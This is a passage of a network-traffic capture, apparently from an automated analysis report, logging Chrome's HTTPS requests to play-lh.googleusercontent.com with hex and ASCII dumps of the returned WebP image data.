                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC856INData Raw: 52 49 46 46 fe 27 00 00 57 45 42 50 56 50 38 20 f2 27 00 00 f0 90 00 9d 01 2a a6 00 28 01 3e 55 24 8f 45 23 a2 21 13 ea 86 b4 38 05 44 b2 37 6e bd c0 30 da 01 1f a8 7e 5d 77 a7 77 ff 21 f8 e1 fc f7 f5 ef e6 1a ce fe 63 fb 67 e9 5f dd 0e 70 d3 61 d9 ef ec 3f 32 ff b8 7c b8 ff 1d ff 13 fa a7 bb cf d2 9f f4 bd c0 3f 4e 3f d7 ff 52 fc 6f f8 b7 f5 a9 fb 95 ea 1f f9 b7 f7 1f fb df de fd dd ff d6 7e c0 7b b2 fe e3 ea 07 fd 5f fb c7 ac 77 fa ef ff fe e5 7f b5 de c1 5f cd 3f cd 7f f5 f5 cb fd d5 f8 36 fe b9 fe f7 f7 4b e0 5f f6 53 fe ff b0 07 ff 5f 50 0f fc dd 61 fd 73 fe a7 da cf f8 2f ca 1f 3c 7c 5f fa 3b f7 4f dc 7f f0 5e da d8 eb b4 9f e5 5f 78 ff 45 fd c7 f7 1f d8 bf f8 7e 1a fc 6a ff 03 d4 3b f1 df e6 ff e5 bf 35 b8 94 76 cf f5 df f6 bd 45 fd 95 fa 9f fb 0f
                                                                                                                                                                                                                                  Data Ascii: RIFF'WEBPVP8 '*(>U$E#!8D7n0~]ww!cg_pa?2|?N?Ro~{_w_?6K_S_Pas/<|_;O^_xE~j;5vE
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: bd bf d3 8a 60 d4 9f ee a0 6f 4d 4a 44 e1 7c b1 5a 26 88 17 ef 91 b3 74 2d 79 d3 54 d0 c3 15 67 4a 39 20 9b 5e 6a 4d bf 6e aa 3b ef 59 a7 13 ec 49 dd 43 1c cd 7b 2a fc 73 75 5b a2 f8 c1 aa 6c b6 69 42 6f 39 ec 0b cd 72 df 9f b5 4e da 40 6b b9 8d cb 7b 6c 3f ef 94 c7 27 fa cb 24 a3 f0 56 3b 44 49 1a fa 52 97 37 58 aa 7c 93 07 4c 25 c7 93 38 8a 7f 02 e1 c0 c8 15 2c 82 af a9 18 ec 57 2b 85 0e eb 9a ab 58 2c 73 77 70 3e 6c 0d 59 ca b7 a0 74 ae 2c a8 a0 52 84 de dc 55 e5 43 fd 2a 07 b1 65 60 49 96 19 60 b3 d3 39 66 89 b3 46 6f 9b dd fd d0 b6 21 f7 01 1a aa 60 bd 9c 8b 4a 13 77 e4 de 34 b2 1d d1 e6 d7 dd 19 8c 8d 67 fd 5a e6 c2 79 65 ff 0c a4 c0 6b b5 9b b1 9a 5d 22 fb 1c 16 17 1d 74 21 2c d3 2b 99 d2 f8 99 58 5c 66 df 3d 91 7d cf c1 ad 02 dd ff be bb 96 73 c8
                                                                                                                                                                                                                                  Data Ascii: `oMJD|Z&t-yTgJ9 ^jMn;YIC{*su[liBo9rN@k{l?'$V;DIR7X|L%8,W+X,swp>lYt,RUC*e`I`9fFo!`Jw4gZyek]"t!,+X\f=}s
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: ea f2 94 e6 3d a6 fa 21 73 5d 45 c9 39 39 44 7a e0 80 b5 62 85 01 76 3c 80 a2 99 f5 95 1e 46 dc c1 48 8c d7 46 72 a6 5b 78 21 ae 9d 59 d4 35 d3 6f 61 16 2a a1 ce f2 f4 6d 2f 88 17 fa f9 c8 d1 15 f4 eb 5d 64 25 5a e3 fe 8f 26 6f 01 d8 01 71 b1 72 8e 57 8a e6 34 06 64 45 07 a8 49 95 7b 35 38 7c 34 4f a3 9d 7e f5 ee d5 dd 69 0a 57 42 d1 ad 9d 17 80 ec 32 10 6b c0 e0 52 40 dd 51 ed 6d f9 6d 3a 0d 5b d6 1c 54 ae 48 eb 3f 2c cc 69 1d 86 95 a0 21 9b c7 b6 b3 f5 ad 17 96 64 2f 88 a6 d1 8f e5 a9 45 85 5c be 4f f2 26 0a d0 a0 87 d4 ab 72 ad 7f ec cf ab 60 77 af ff 51 43 fb 30 b1 11 38 f2 09 02 03 80 52 15 c4 e5 e3 e4 08 36 ba fd 84 1f 3f c6 84 7b 4e c0 4c 35 6a 58 b5 74 96 ea b4 75 af ee e8 2e 44 a1 8b 98 13 2d 2f 28 4d d5 89 34 77 b5 d2 ab d6 6b e7 dd 17 df dd 25
                                                                                                                                                                                                                                  Data Ascii: =!s]E99Dzbv<FHFr[x!Y5oa*m/]d%Z&oqrW4dEI{58|4O~iWB2kR@Qmm:[TH?,i!d/E\O&r`wQC08R6?{NL5jXtu.D-/(M4wk%
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 6d 65 cb d1 66 81 23 64 6f 5b c1 8d 3d 61 de 82 9f 80 51 8c dd 0b a6 dd 37 6c 7d aa 19 63 20 a8 51 ba 4c d5 9f 3d e6 b4 5f e5 ff 9a 77 48 ef ed 2e 77 18 92 76 0f 7c 31 e4 77 88 2c 74 29 37 d8 5d 43 17 8a a1 12 d4 1c f8 bf 20 e9 c0 b1 62 94 b9 af df c0 2d 20 6d c1 d4 24 91 f1 31 8a 8c 52 ba 81 e1 29 7e 02 39 00 72 41 b8 06 b0 87 ba 22 5b 27 fe 4f 9e 5a 6d 23 fb 64 86 d1 16 32 07 8f 0a 9f 14 c1 ee 0e 93 1e 3c 5a 92 27 13 47 b8 c6 f5 b0 ba 94 31 bf 0b 3e df d2 1e 47 05 9f b2 10 c1 ec 2d 22 29 63 12 85 cc 67 d1 5c b3 a2 5a 1b a1 fe a8 f7 80 c7 10 06 71 61 23 86 70 0d 4d f9 83 b4 4f d5 2f 45 bc d5 71 66 13 f1 5e e5 54 4d 47 32 cb 37 e5 22 f9 b5 ab 03 ba 09 8c a7 6d 3d 8c fd c4 60 8c 58 7c e4 4f ee ff 61 89 04 d6 ac 9b 81 2a b5 97 cd ca 8a c1 df cd 31 9e a4 69
                                                                                                                                                                                                                                  Data Ascii: mef#do[=aQ7l}c QL=_wH.wv|1w,t)7]C b- m$1R)~9rA"['OZm#d2<Z'G1>G-")cg\Zqa#pMO/Eqf^TMG27"m=`X|Oa*1i
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 91 75 17 b2 a2 23 b7 cb 7c 05 49 d0 0e 0f bd b8 83 65 d2 15 40 44 29 95 a5 96 43 e3 e9 69 dd 87 55 c3 2f 40 a7 b2 8b e3 1a d5 1e 64 a9 9c 41 87 a4 05 53 2c 6c 50 17 70 b1 4a 7a 76 3a 4d 50 53 6a f7 97 c1 65 ac 57 70 87 5f 26 6e 4a aa fd 4b 5e 41 80 de f3 29 01 b8 1d 54 b9 72 53 1d 56 dc 3a 3c 16 84 b2 34 a4 3f 1f 62 46 39 1c ca 5c 74 66 38 e2 f5 4d 39 90 95 59 0e 9a 57 30 57 e4 0a 6d 54 4a c8 32 1d 5b e1 89 3b 99 01 b4 b3 2d 6a 0b eb 1f 0d 92 40 a1 ae 53 24 e5 6f 71 b3 de 84 52 83 72 68 d8 37 02 51 0a fa b8 94 a0 a3 85 cd 1d 49 93 26 ff ac 3b 03 95 bf c8 15 c0 52 d1 18 3b b6 51 7a 9f 70 c0 0a a8 fc d2 2f 1b d8 e8 81 0a 1e 8d 81 83 9c e3 e6 09 eb c4 f7 ac d0 5a 33 33 66 67 39 de 7f 01 f8 7f a7 c4 c5 f1 95 94 05 90 d9 43 f4 c4 fe 0b e7 e4 7b 0f b2 85 39 bb
                                                                                                                                                                                                                                  Data Ascii: u#|Ie@D)CiU/@dAS,lPpJzv:MPSjeWp_&nJK^A)TrSV:<4?bF9\tf8M9YW0WmTJ2[;-j@S$oqRrh7QI&;R;Qzp/Z33fg9C{9
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 64 ac de 00 45 d0 5f da 30 7d 15 4d ea 33 a9 9d 2c 51 62 57 c2 9c e7 44 53 d3 87 26 74 37 d6 d3 ae b1 34 4b 34 72 42 b1 61 0c 34 bc 96 7d 45 a7 39 95 f1 0c 98 8f 1d c2 6d f2 a5 08 69 c2 c3 a7 69 4e 89 aa 21 77 42 33 bd f9 94 da fc 7f 68 b2 f2 95 41 cd 66 02 bb c0 3f 91 39 d6 bf 79 7a 6a 73 dc 3f 43 5b 9f 25 bc 81 34 ac 0c aa 21 e5 e1 9d 8b 1a 5c a3 fd de 69 ae c3 f7 a8 f2 3d af 8a a4 63 84 f0 23 b8 de 6a f6 40 94 63 ef 46 f6 0e da f7 d4 14 fb 67 9b d8 63 c5 86 fe 25 98 cc 52 a3 b1 e2 3d 4c d3 40 d5 be ea ce 42 fb 3a 77 ee 8e 91 d0 f4 22 76 2a 13 6b 6e c6 f4 ce d3 8f d2 26 f2 49 b3 90 df cc 7f ad d6 79 3f a2 f5 b1 ce 90 ac 28 2f 0b 0e e4 65 d8 9f 1b 76 f8 53 d0 99 72 7e f8 8c 8a 27 cf c1 db a4 64 b6 be 37 b5 37 e4 97 56 cc b7 ca 8e 35 f2 be 6e 13 dd 95 f2
                                                                                                                                                                                                                                  Data Ascii: dE_0}M3,QbWDS&t74K4rBa4}E9miiN!wB3hAf?9yzjs?C[%4!\i=c#j@cFgc%R=L@B:w"v*kn&Iy?(/evSr~'d77V5n
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 30 97 93 a6 fe 56 c3 9c c5 47 16 0b 1f cb 3c 9d de b7 27 9d f7 47 38 c0 d2 10 aa 79 d4 0d 20 5e f2 ca 4f 05 c1 3e 35 a7 4d 25 50 f1 08 4b d6 d6 43 09 76 79 bd 51 65 3e 8c 3a e7 da e3 81 2e e2 41 4f 73 54 c4 ce 13 1d b1 e7 a5 66 55 e8 8b ea 8b 40 e7 58 33 93 81 ad 69 0e 1c 24 2e 49 34 c2 bb c8 2a 14 a1 03 ae 34 98 19 84 8f cc a7 37 07 0e 6c b9 23 de e3 6e 03 60 03 a5 f7 fd 80 3d 19 1a 77 f8 51 c1 9d c8 0a fc f2 d4 b4 76 16 f6 13 89 64 d4 b6 6e 86 09 20 ef 01 83 d5 54 93 b0 52 36 60 47 2b e5 fa 46 6d 5e 98 c7 7f 97 3d c5 8e 07 58 f4 f9 b7 aa 4f 8f 43 80 88 be d6 7d ab 9e 08 a7 10 de 45 11 4b 36 d5 25 51 14 e0 ea 84 d2 69 8c 66 fc 29 ce 5f 53 2d 31 eb 16 bc 49 fa 4c d6 00 2a 56 c2 e9 fa f0 f9 19 93 e4 03 a0 98 52 5d 8d 94 64 bf f9 4f d3 60 34 b9 4a 48 e0 3e
                                                                                                                                                                                                                                  Data Ascii: 0VG<'G8y ^O>5M%PKCvyQe>:.AOsTfU@X3i$.I4*47l#n`=wQvdn TR6`G+Fm^=XOC}EK6%Qif)_S-1IL*VR]dO`4JH>
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1050INData Raw: 81 e2 d4 56 37 69 33 dc 60 84 84 04 74 3b ff e2 fa 67 fa 6a 2e 61 43 16 af 94 ea 80 2d ee 2c 85 ce c2 0e 44 ca d2 f3 96 8c 43 29 bd 94 b9 33 77 38 a5 c3 2f 14 47 25 14 4c b8 b3 c6 e0 1c 03 ac 7f 5c 73 9f a6 a9 bd 36 24 68 64 d9 9b 02 7b 53 88 ff 73 96 6d 23 1e 7e aa 1e 86 5e 66 59 3b 25 4c bf 75 40 9e dd 40 aa ba 87 32 08 59 ba 26 6f 11 6d c3 0b 3d 18 f0 0b a3 88 7c fb 42 b5 a8 3c 8d 78 d8 a2 8f c1 9d e5 97 f9 26 f4 12 0d d2 7c 3f 82 2d fc 5c 06 42 64 94 e8 09 9e 70 94 69 47 b7 01 54 ea 35 ea a1 5a 6e 64 f3 c9 af e6 cc 26 38 92 50 e7 9f 93 00 79 5d 7e c5 dd 5f 13 bb a8 f4 d1 48 ee 91 b0 ca bb 59 f5 2a 1c ea e6 0c cc bb 90 7e 31 25 90 08 67 40 06 36 c7 31 2d 1b 7c 20 57 a3 57 17 23 e7 6f 9e b4 dc 1e f3 34 a6 e0 b6 86 7f 95 b2 df dd a0 7b e0 da e0 3c c5 99
                                                                                                                                                                                                                                  Data Ascii: V7i3`t;gj.aC-,DC)3w8/G%L\s6$hd{Ssm#~^fY;%Lu@@2Y&om=|B<x&|?-\BdpiGT5Znd&8Py]~_HY*~1%g@61-| WW#o4{<


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  130192.168.2.649989142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC511OUTGET /bhwvgLPwlrUGC29L7T2GkUyJe7bPzKxeuRFxEHWG7RCFDP_PtJ5WPtdk6QW-KKMn7Zy2=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 10850
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5846
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC856INData Raw: 52 49 46 46 5a 2a 00 00 57 45 42 50 56 50 38 20 4e 2a 00 00 b0 8c 00 9d 01 2a a6 00 28 01 3e 5d 24 8f 45 23 a2 21 17 5a d6 04 38 05 c4 b4 04 38 00 ca 8a 1c 7f 39 d6 e5 b9 bb cf e4 bf e2 c7 cc ad 8d fb 9f e0 7f cb ae 82 1a f7 e8 03 df 83 9d 3f d3 ff 85 fd dc fe fb f3 47 fc 07 fc df f2 1e e8 3f 47 fb 02 fe a5 ff 99 fe f5 fd b7 fe df 6a 3f dd 3f c0 0f 80 df d2 ff c5 fe cc 7b c1 7f b3 fd 80 f7 65 fd c7 d4 0f fb 87 f7 5f 5a 2f f7 ff ff fd c8 ff bc ff 97 ff ff ee 27 fb 01 ff b7 d7 3f f6 f3 e0 cf fb 37 fc 8f db ff 81 1f d9 6f fc 9e c0 1f fc bd 40 3f ec 75 97 f5 53 fb 8f 6c 1f e1 7f 28 7c f3 f1 63 e9 1f 6b 3f b0 fb 6b 7f 7d e1 3b a9 bf e4 7a 29 fc b3 ed ff e6 ff b8 fe e8 fb 27 ff 23 c2 3f 8d bf e3 7a 82 fe 39 fc 9f fc c7 f6 df c8 4f 56 5d a0 fa ef fb 9f f7 de a0
                                                                                                                                                                                                                                  Data Ascii: RIFFZ*WEBPVP8 N**(>]$E#!Z889?G?Gj??{e_Z/'?7o@?uSl(|ck?k};z)'#?z9OV]
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 7c 94 58 70 e3 7b 61 e0 2c 6b 4b 16 65 28 fb b3 99 16 54 05 80 3c 02 03 32 2a 24 f8 ac b6 57 7d 02 76 e5 9f 22 e8 47 c8 25 d6 21 ce a8 95 47 dd b0 22 8c b8 fb 4f f1 3a 9e f3 6b fc 98 5c 8f e8 52 13 cc 67 de 4a 6f aa b3 ee cc db 21 49 34 be d8 df f0 5b fc 02 a3 b9 ec d5 ca 42 8a ac 64 66 86 92 86 eb 8c 89 d5 1d 1d 51 d0 e5 8e 70 fa 6c 9c 4b c2 f2 e2 c5 06 bb ba 79 7b 42 7b 3e f3 88 fa 81 ce 79 fb 7b 96 0c 3e 59 24 a8 e1 10 9b 4c 08 0e b7 12 4a 2a fc cf cf 94 48 08 c5 ff 0c f5 7d 3d 26 dc 73 5f d6 a7 a6 98 a2 09 34 fc 0e c6 5b 92 33 f9 31 9e 7f 93 27 2c 5b 17 6e 7c a1 05 20 55 02 d0 b3 00 b5 5d 39 bb fd 0a 94 3a 11 ef 37 22 d3 64 e6 99 e8 12 a9 36 06 22 74 b3 52 5b 48 c2 af c5 3c 1e 29 c0 46 22 7d f0 1e e7 3b 36 f0 a6 24 37 4b 32 95 0f 08 65 ea e1 7c 71 fd
                                                                                                                                                                                                                                  Data Ascii: |Xp{a,kKe(T<2*$W}v"G%!G"O:k\RgJo!I4[BdfQplKy{B{>y{>Y$LJ*H}=&s_4[31',[n| U]9:7"d6"tR[H<)F"};6$7K2e|q
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: ab f6 98 33 fc 2b d8 0d 2a 34 75 1d a3 94 ff 04 3c 6a 0d 18 75 d9 e1 d9 7f 6d a9 9e ea 69 11 b9 82 1d a6 93 60 d7 b7 93 8b 29 c4 91 88 78 ef 3e cb 27 e3 46 fe 88 2d 37 5e 27 eb 6b ad ce 8a 30 18 7a 2b 16 56 d0 df 2a 75 19 49 32 a1 20 df fe 1e e7 b2 8a c6 2f 0f 7f 80 ad fd 0a 30 46 f1 e0 e9 3b 74 83 50 6d db b3 3c a6 9f d5 7f 6b 80 01 a2 4e a3 8c 63 e4 3d 86 58 d5 bc 4e c9 dd 7c 3a 82 66 22 87 73 6a 89 89 a4 f9 ba cd 13 f8 e3 1d 29 16 e6 08 74 19 5b 52 cf 03 91 26 52 73 88 5b 3a 10 e0 e4 a9 56 92 1e 32 a1 7f c6 5e d9 11 cd 47 b6 07 0f 8e ce 31 1b fb 37 fb ee 3a bc 59 f1 20 db 05 80 4e 84 75 44 84 95 71 a7 a5 cc 76 68 75 16 69 c3 dd 5f ee fd 68 13 c1 d6 7d 84 99 be 88 0f 37 2e 7f 8d c9 7a 5b 00 58 f4 73 00 0b bf 02 e5 8e 24 9b 84 f5 e7 cf ab 7f 52 49 df 8f
                                                                                                                                                                                                                                  Data Ascii: 3+*4u<jumi`)x>'F-7^'k0z+V*uI2 /0F;tPm<kNc=XN|:f"sj)t[R&Rs[:V2^G17:Y NuDqvhui_h}7.z[Xs$RI
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 47 44 42 f0 46 25 6d 4a 36 90 90 62 63 ca 24 1d fc 1e 25 c6 90 ba f5 be c5 c0 bd 24 b0 08 70 0d a1 0c f5 3f 06 12 0c aa fc 82 29 d6 27 79 b3 16 27 d4 27 02 e1 87 33 d4 fc 85 e0 7a 39 0e 2c 46 ef d1 44 22 47 93 b3 3e 95 95 26 05 ae 68 3a 9e e5 e8 e2 e2 9a 0b a7 ce 99 22 30 fa 7e a2 87 0f cc 21 bb d6 ab f6 da e5 35 12 e2 79 ed 7c ca 8c e3 d4 a0 57 ac 69 83 7d 86 85 9e c7 d8 24 5a 8a c2 fb 2f ff 01 92 21 82 74 3e 3b ca e4 9d bf 65 e8 97 5f 61 ea 84 8a ea 91 75 b3 b7 1f a5 60 08 74 10 4f f5 a7 00 cc 40 82 ed 73 b6 b1 d2 91 79 ae aa 62 e4 b3 e0 8a a1 9a 7f b6 2b 5b 15 55 bb 68 e9 3d 9f d9 23 06 cf f3 e6 6b ff 04 8b f6 7e c4 f8 9f ae 8c 0b 1d 7b fa 00 81 c7 6f c2 57 bc 8a bf 5f 0f 82 b5 27 30 8c 6f 9a 64 5e 13 86 10 71 b5 53 e7 da 40 99 c5 42 bd 99 5c b8 96 5a
                                                                                                                                                                                                                                  Data Ascii: GDBF%mJ6bc$%$p?)'y''3z9,FD"G>&h:"0~!5y|Wi}$Z/!t>;e_au`tO@syb+[Uh=#k~{oW_'0od^qS@B\Z
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 0f e0 58 b6 d9 aa f3 0a 49 be ab d4 e7 b5 59 10 34 ea 42 2c 91 fd a6 3e e0 2c d8 09 48 5a ee 11 05 d8 fd 29 ae f9 6c ab e9 54 31 76 c9 0b b7 ea 41 84 c0 34 a8 87 95 e4 cb ca b6 3f a5 88 70 9e 95 10 f9 a0 e1 40 32 3d 38 b6 ec 7c 3a a9 2d 51 86 9f 6f 19 5f f0 42 6a 78 29 92 96 10 1e 40 8e 78 98 67 3a 34 f6 81 08 23 e9 ca 2b d1 00 86 87 dc 4e b6 70 a6 d4 0d 71 f6 26 c0 c5 00 4b f9 c2 c0 12 ba 04 95 fb fa 9d 7d b6 b3 57 90 3d 24 7b bd ae ed 04 38 1c aa af a9 fb b1 4d 90 28 a6 70 1d ec 62 57 72 59 0c 84 72 11 15 5b dc 03 85 d3 a2 e5 2d 54 66 6b 3e a3 bf ed 1c 33 d1 a4 89 a1 8f 8b f0 66 0c 2c c4 b4 92 ef 82 6e d5 6e 20 8b 0d 54 b2 3b 8d 3c 71 17 d4 75 fa fb 35 f5 e4 8e 85 a6 05 44 c7 23 f3 9d ba fb ef 51 cb d1 b4 6e aa c8 9b ed 24 d9 24 e6 e3 ca 2d c2 e5 13 9c
                                                                                                                                                                                                                                  Data Ascii: XIY4B,>,HZ)lT1vA4?p@2=8|:-Qo_Bjx)@xg:4#+Npq&K}W=${8M(pbWrYr[-Tfk>3f,nn T;<qu5D#Qn$$-
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 81 b3 16 a0 cb 62 ad 03 bf 02 c3 37 67 46 8a 90 cb 43 0e a3 c5 b9 2c 9d 00 ed 0a 61 2b 0e c5 39 d5 f9 75 ca d6 14 46 33 45 08 d5 f4 c7 45 9c 26 bf f2 89 bb 83 ce 53 8a 29 4c 1d 80 51 43 19 9a 9f 90 5a 42 fd 79 5a 00 a7 f9 bb 6d 2d fe 8a af 70 d0 05 89 fa a3 ee 28 3c 01 aa 8f 38 93 0a 49 1e 54 e8 6d fe 10 84 8a a1 db 20 d6 7d ef cf d7 d3 36 57 9c d0 b2 c2 af c3 db 97 be 16 e6 33 06 12 3b cb be 61 94 7f 6f 8a da c1 b7 fa 72 55 e8 22 8f 10 09 c4 bb 55 4c ab 57 78 b2 13 3d 62 0f 10 e1 3d e1 cc c4 4d 6b e7 72 bb 9f f7 3a f1 9d e3 ea df b7 a7 66 4a 97 1a 3b 4d d7 95 e2 4c 9b 5f 05 56 22 85 9e 44 d7 26 b6 a6 b2 17 82 70 78 6b 8d de 97 16 5b 93 eb 09 08 3a da 29 a5 a5 59 1a 64 61 6b 0f af 99 37 19 67 77 c7 29 21 6c 8e d7 ac e2 41 cf 22 d4 80 6c 49 5b ed 11 e5 3f
                                                                                                                                                                                                                                  Data Ascii: b7gFC,a+9uF3EE&S)LQCZByZm-p(<8ITm }6W3;aorU"ULWx=b=Mkr:fJ;ML_V"D&pxk[:)Ydak7gw)!lA"lI[?
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: e3 84 c7 b4 ed 5c 51 64 29 32 27 88 c1 fa 45 b4 85 39 d4 ba 68 23 1d 33 00 40 07 5d c8 a6 ca 4c db c3 d8 7c 71 6b fd a7 19 a3 ce b9 46 b4 d7 c1 3e 0a e1 a8 3a bd 81 d6 af af ac 7d b6 06 43 69 3e 7c ca 84 23 aa df f9 cc e7 af a9 15 41 35 c9 97 c4 b1 39 21 29 16 32 13 5e 95 67 52 48 14 06 de fa 7c d7 d7 6c 38 18 58 8d f1 0a 52 92 f6 38 d6 ae fd 90 a5 99 a0 91 df 30 de 37 ed 8b 42 a4 e3 47 0f 52 a0 c3 22 7b bd 48 24 c0 07 01 82 25 e5 89 7a 55 b0 69 a8 4e 5d 12 c3 ed 72 8b 0a e6 e3 7e 4a 99 42 72 79 2d 68 9a 4f 4e d1 3e b4 5f f1 9f c1 43 0f 6d 23 69 dc e0 1f ca 27 64 53 37 0a e9 ef 44 38 42 15 26 97 dc c4 7a 8a 0f 27 13 5c fd 1d b1 18 19 08 e7 c2 13 50 26 83 fa 01 09 29 d3 2f dc 56 8f 0f 16 08 94 87 fe aa 03 00 17 a0 51 84 8a c2 7f 83 5e de ce 19 bd 68 cb f1
                                                                                                                                                                                                                                  Data Ascii: \Qd)2'E9h#3@]L|qkF>:}Ci>|#A59!)2^gRH|l8XR807BGR"{H$%zUiN]r~JBry-hON>_Cm#i'dS7D8B&z'\P&)/VQ^h
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 5c 1c 6b 3a d6 75 1d 15 54 86 e8 d9 2d e3 6c 3f b6 f5 29 a0 d4 73 83 63 53 39 c8 8b ba 66 a9 ee ad 21 96 a8 99 ec c9 fb 2d 34 02 da 0c a6 db 88 69 57 89 76 cb d3 b2 c3 8b ab ca e1 67 d0 b2 bd 5b 58 89 39 7c 15 a9 cd 10 3f 44 7e 9e d9 8d b2 76 7a 96 ba cc 70 78 34 bc 80 9d c1 04 d6 a4 a1 e3 d4 71 31 fa c2 7f 0b f7 9b e6 b0 e8 bc a2 11 68 76 89 cb a3 20 4c a0 ad fc 2d d1 3f e1 92 37 ab 8c aa 02 1c 29 57 cf 6b 49 20 87 a9 d3 ce 2a 15 f1 82 3d 7b af 41 4f f2 4c ea d3 67 40 8b ea dd f9 7f 11 7a 9c 16 d9 04 4c e8 fb e3 25 a2 04 a1 ef 63 a9 fb 72 52 38 e6 8a 04 58 5c 3f ae 24 56 ad ff c9 32 7b 8e 87 9d e3 03 a9 65 60 ae 2c 10 d9 ac 5b bd da bd 9d fe 4d c7 93 34 82 3b 60 b6 73 cf 52 ab b9 d4 95 f9 dd 86 91 26 63 2f 6c ed c8 76 3d ad 07 f9 bc 73 ef 5b b5 8a 5b 73
                                                                                                                                                                                                                                  Data Ascii: \k:uT-l?)scS9f!-4iWvg[X9|?D~vzpx4q1hv L-?7)WkI *={AOLg@zL%crR8X\?$V2{e`,[M4;`sR&c/lv=s[[s
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC264INData Raw: 49 1a 3d cd 76 b7 3b 30 8f e2 86 b8 fb a7 66 0a 63 0f 09 e1 89 97 40 9c f0 e8 3f 3a 75 0d 67 eb 05 aa 43 36 d1 50 c4 eb 76 1b 16 07 fd 1e 6f 00 14 92 87 2d 81 8e 26 46 a8 b6 cf 60 b1 6a b8 89 40 af f2 0c a7 6e e3 d2 de 2f 9e 4e 29 06 de 8e 10 31 9f 5e 6c d4 0c 2a 17 d9 81 29 79 c5 ef 15 9d e9 64 07 7d ba 47 23 d7 2c c1 1d 28 b7 72 3c e3 a4 bf cd d0 1c 17 49 37 72 1f a7 ce 85 d2 04 b9 92 eb f3 8b 7f f5 68 00 5d 96 f9 c0 99 40 a0 05 4a f9 d9 b4 7c c8 12 ca fd 99 b5 fb 6a bb 82 e3 b1 45 c4 da 22 65 7d 80 ae db a0 8a e1 5b bd c0 41 29 a0 52 3f 8b ee 64 00 46 f1 a3 bd 2d 39 fb 72 d6 7e 20 1e 6e f3 ab e3 c6 64 19 ef 9b 35 00 dc 03 d5 b8 48 77 83 c4 a0 00 03 70 2b 9a d7 f9 a7 ff 9f 2c f1 8d 45 68 96 2f b7 cb 56 6c a9 dd 28 03 fc 90 57 55 57 2f 7e 7e f1 14 09 56
                                                                                                                                                                                                                                  Data Ascii: I=v;0fc@?:ugC6Pvo-&F`j@n/N)1^l*)yd}G#,(r<I7rh]@J|jE"e}[A)R?dF-9r~ nd5Hwp+,Eh/Vl(WUW/~~V


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  131192.168.2.649991142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC509OUTGET /_GRprxsBpsoPiM1vG1Qf6nHgqhBePssy13A3rff_JoYV4qn4dYP9Zs5yed_K_QYOdA=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
